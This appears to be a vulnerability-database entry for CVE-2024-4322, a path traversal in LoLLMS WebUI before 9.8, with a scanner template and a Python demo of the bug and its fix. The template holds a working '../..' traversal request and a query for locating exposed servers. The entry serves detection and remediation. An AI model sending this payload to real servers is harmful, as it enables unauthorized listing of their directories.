
LoLLMS WebUI < 9.8 - Path Traversal

CVE-2024-4322
Verified

Description

parisneo/lollms-webui contains a path traversal vulnerability caused by improper handling of the 'category' parameter of the /list_personalities endpoint. An attacker who controls the 'category' parameter can list arbitrary directories on the server.

Severity

High

CVSS Score

7.5

Exploit Probability

45%

Published Date

May 10, 2026

Template Author

mj-bin

CVE-2024-4322.yaml
id: CVE-2024-4322

info:
  name: LoLLMS WebUI < 9.8 - Path Traversal
  author: MJ-bin
  severity: high
  description: |
   parisneo/lollms-webui contains a path traversal vulnerability caused by improper handling of the 'category' parameter of the /list_personalities endpoint. An attacker who controls the 'category' parameter can list arbitrary directories on the server.
  impact: |
   Attackers can list arbitrary directories on the server, disclosing directory and file names that can support further exploitation.
  remediation: |
   Validate the 'category' parameter (reject path separators and '..' components and confirm the resolved path stays inside the personalities directory); update to version 9.8 or later.
  reference:
    - https://huntr.com/bounties/5116d858-ce00-418c-a5a5-851c5608c209
    - https://nvd.nist.gov/vuln/detail/CVE-2024-4322
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-4322
    cwe-id: CWE-29
    epss-score: 0.45155
    epss-percentile: 0.97688
    cpe: cpe:2.3:a:lollms:lollms_web_ui:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="LoLLMS WebUI - Welcome"
  tags: cve,cve2024,lollms-webui,lollms,traversal,ai

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/"

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "LoLLMS WebUI - Welcome")'
        internal: true
        condition: and

  - method: GET
    path:
      - "{{BaseURL}}/list_personalities?category=../.."

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "\"lollms_core\"", "\"personal_data\"")'
        condition: and
# digest: 4a0a0047304502207dc799d8f5ab42eeb466ed0179e84bb7a3ec25707682124b1f3453b5f9532ba1022100bec613a964104b2573d98ba63b5fcf50645f1d0742de2ba1120c11c94c11a46a:922c64590222798bb761d5b6d8e72950
Score

7.5

CVSS Metrics

CVSS Vector:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
CVE-2024-4322
CWE ID:
CWE-29

References

https://huntr.com/bounties/5116d858-ce00-418c-a5a5-851c5608c209
https://nvd.nist.gov/vuln/detail/CVE-2024-4322

Remediation Steps

Validate the 'category' parameter (reject path separators and '..' components and confirm the resolved path stays inside the personalities directory); update to version 9.8 or later.
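The bug class and the fix side by side, as an added example that is not lollms-webui's own code: the vulnerable handler joins the caller-supplied category onto the personalities directory without checking the result, so "../.." (the payload the template sends) walks out of the base and lists its grandparent, where the "lollms_core" and "personal_data" entries the template matches on live. The hardened version resolves the joined path and refuses anything that does not stay inside the base. The directory layout, the function names and the temporary-directory fixture are assumptions built for the demonstration, not the project's real structure.

```python
"""Vulnerable vs. hardened directory listing for a 'category' parameter.
Added illustration, not lollms-webui code; layout and names are assumed."""
import os
import tempfile
from pathlib import Path
from typing import Optional


def build_fixture() -> Path:
    """Constructed on-disk layout loosely mimicking a lollms install:
         <root>/lollms_core
         <root>/personal_data
         <root>/zoo/personalities_zoo/<category>/<personality>
    Returns the personalities_zoo directory that the handlers use as base."""
    root = Path(tempfile.mkdtemp(prefix="lollms_demo_"))
    for name in ("lollms_core", "personal_data"):
        (root / name).mkdir()
    zoo = root / "zoo" / "personalities_zoo"
    (zoo / "generic" / "lollms").mkdir(parents=True)
    (zoo / "coding" / "python_dev").mkdir(parents=True)
    return zoo


def list_personalities_vulnerable(base: Path, category: str) -> list:
    """Unchecked join: pathlib keeps the '..' components, so
    base / '../..' is listed two levels above the personalities directory.
    An absolute category (e.g. '/etc') replaces the base entirely."""
    target = base / category
    return sorted(os.listdir(target))


def list_personalities_hardened(base: Path, category: str) -> Optional[list]:
    """Resolve the joined path (this also follows symlinks) and require it
    to remain inside the resolved base. Returns None for anything else;
    the HTTP layer should turn that into a 400/404 rather than an error page."""
    base_real = base.resolve()
    target = (base_real / category).resolve()
    try:
        target.relative_to(base_real)
    except ValueError:
        return None                      # escaped the personalities directory
    if target == base_real or not target.is_dir():
        return None                      # empty/'.' category or unknown category
    return sorted(os.listdir(target))


if __name__ == "__main__":
    zoo = build_fixture()
    print("vulnerable, generic :", list_personalities_vulnerable(zoo, "generic"))
    print("vulnerable, ../..   :", list_personalities_vulnerable(zoo, "../.."))
    print("hardened,   generic :", list_personalities_hardened(zoo, "generic"))
    print("hardened,   ../..   :", list_personalities_hardened(zoo, "../.."))
```

The check is done on the resolved path rather than by stripping ".." from the string: string filtering misses encoded separators, absolute paths and symlinked categories, while `relative_to` on the resolved path rejects all of them with one rule.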